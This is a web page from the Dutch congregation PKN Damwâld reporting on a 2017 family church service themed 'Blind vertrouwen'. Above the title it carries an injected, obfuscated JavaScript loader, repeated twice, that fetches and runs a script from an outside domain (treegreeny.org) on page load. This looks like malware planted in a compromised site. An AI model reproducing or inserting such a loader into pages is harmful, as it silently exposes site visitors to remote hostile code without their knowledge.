;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 'Blind vertrouwen' ... prachtige gezinsdienst ! - PKN Damwâld

‘Blind vertrouwen’ … prachtige gezinsdienst !

Gepubliceerd op: zondag 5 maart 2017

Was je er niet bij? Dan heb je echt iets gemist. Afgelopen zondagmiddag in De Ontmoeting in Damwâld was er een speciale gezinsdienst met als thema ‘Blind vertrouwen’. Aan de hand van een paar indrukwekkende filmpjes over hoe jongeren ervaren om blind te zijn en een indrukwekkende prestatie van Elroy om zich geblinddoekt door de kerk te laten leiden, liet ds. S. Boukes aan de hand van het Bijbelverhaal over Bartiméus alle aanwezigen weten dat je altijd weer op God mag vertrouwen. Prachtig was verder dat Paul op eigentijdse wijze de geloofsbelijdenis uitsprak en uiteraard konden we volop genieten, mee spelen en hardop meezingen met gospelband SIGN.

Een heerlijke kerkdienst … heel divers …  en wat goed om ons weer te beseffen dat we in dat vertrouwen ook de vreugde van ons geloof mogen delen. Vertrouwen we op God, dan stralen we dat ook uit. Zo zijn we herkenbaar. En iedereen die daarin delen wil, is meer dan welkom !